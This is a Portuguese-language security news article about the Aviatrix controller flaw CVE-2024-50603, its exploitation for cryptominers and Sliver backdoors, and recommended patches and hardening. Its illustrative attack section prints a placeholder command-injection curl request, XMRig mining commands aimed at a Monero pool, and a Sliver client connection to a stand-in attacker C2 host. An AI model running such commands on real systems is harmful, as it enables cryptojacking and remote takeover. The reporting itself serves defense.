Hackers exploram vulnerabilidade crítica no controlador Aviatrix para implantar backdoors e mineradores de criptomoedas
No cenário da segurança cibernética, vulnerabilidades críticas em plataformas de rede em nuvem representam um alto risco para organizações. Recentemente, a falha CVE-2024-50603 no controlador Aviatrix ganhou destaque após ser explorada ativamente por hackers para implantar backdoors e mineradores de criptomoedas. Este artigo detalha como essa vulnerabilidade funciona, seus impactos e as melhores práticas para mitigação.
O que é o Aviatrix
O controlador Aviatrix é uma plataforma que facilita a gestão de redes em nuvem para empresas, permitindo a integração e o controle centralizado de diferentes ambientes de nuvem, como AWS, Azure e Google Cloud.
Por ser amplamente utilizado, qualquer falha nessa plataforma pode comprometer não apenas a infraestrutura da organização, mas também a segurança de dados sensíveis e operações críticas.
Detalhes da vulnerabilidade CVE-2024-50603
Gravidade e impacto
- Pontuação CVSS: 10,0 (Máxima)
- Tipo de Exploração: Execução Remota de Código (RCE)
- Causa: Falha na sanitização de entradas fornecidas pelo usuário em endpoints da API.
Essa vulnerabilidade permite que hackers injetem comandos maliciosos diretamente no sistema operacional da plataforma, abrindo portas para ações não autorizadas como:
- Implantação de mineradores de criptomoedas (usando ferramentas como XMRig);
- Introdução de backdoors para controle remoto do sistema;
- Movimentação lateral no ambiente de nuvem da vítima.
Correções disponíveis
A falha foi corrigida nas versões 7.1.4191 e 7.2.4996. Portanto, a aplicação imediata desses patches é altamente recomendada.
Exploits no mundo real
Pesquisas da Wiz revelaram incidentes envolvendo:
1. Uso de mineradores de criptomoedas:
Após obter acesso inicial, os atacantes configuram o XMRig para minerar Monero, utilizando os recursos computacionais da vítima.
2. Implantação da ferramenta de C2 Sliver:
Hackers utilizam o Sliver para estabelecer persistência, permitindo que continuem explorando o ambiente.
3. Escalada de privilégios:
Nos ambientes de AWS, o controlador Aviatrix configura permissões que podem ser exploradas para acessar níveis administrativos no plano de controle da nuvem.
Como os hackers exploraram a falha
O exploit dessa vulnerabilidade é facilitado pela existência de um Proof of Concept (PoC) público, o que permite que até mesmo agentes de ameaças menos experientes utilizem o código para realizar ataques.
Exemplo de ataque
1. Injeção de comandos maliciosos:
curl -X POST “https://victim-controller/api/vulnerable-endpoint” \ -d “command=inject-malicious-command”
Neste exemplo, um invasor pode enviar comandos que o controlador Aviatrix executa sem validação adequada.
2. Mineração de criptomoedas: Após comprometer o sistema, o XMRig é instalado e configurado para minerar Monero:
sudo apt-get install -y xmrig
xmrig –url pool.monero.hashvault.pro:443 –user wallet_address
3. Backdoor para Persistência: Usando o Sliver, o atacante ganha controle remoto:
./sliver-client connect attacker-c2-server
Recomendações de segurança
1. Aplique os patches imediatamente
Certifique-se de atualizar para as versões corrigidas:
- 7.1.4191 ou 7.2.4996.
2. Restrinja o acesso ao controlador Aviatrix
- Bloqueie o acesso público ao controlador.
- Permita acesso apenas por redes confiáveis e usando VPN.
3. Monitore atividades anômalas
Implemente sistemas de detecção de intrusão (IDS) e monitore logs para identificar comportamentos fora do padrão.
4. Reforce a segurança na nuvem
- Audite permissões em seus ambientes de nuvem.
- Restrinja o uso de credenciais administrativas e habilite autenticação multifator (MFA).
5. Desative APIs não utilizadas
Se determinados endpoints da API não forem necessários, desative-os para reduzir a superfície de ataque.
Conclusão
A vulnerabilidade CVE-2024-50603 no Aviatrix destaca a necessidade de vigilância constante em segurança cibernética. Explorações como a implantação de mineradores de criptomoedas e backdoors representam um risco significativo para empresas, especialmente em ambientes de nuvem.
Aplicar patches rapidamente, restringir acessos desnecessários e monitorar atividades suspeitas são ações essenciais para proteger suas operações. Como exemplo, este incidente reforça a importância de manter todos os componentes de infraestrutura atualizados e de realizar auditorias regulares.
Dica para desenvolvedores e administradores de sistemas
Automatize as atualizações de segurança e monitore vulnerabilidades conhecidas em ferramentas como o controlador Aviatrix para evitar ser a próxima vítima.
Fonte e imagens: https://thehackernews.com/2025/01/hackers-exploit-aviatrix-controller.html
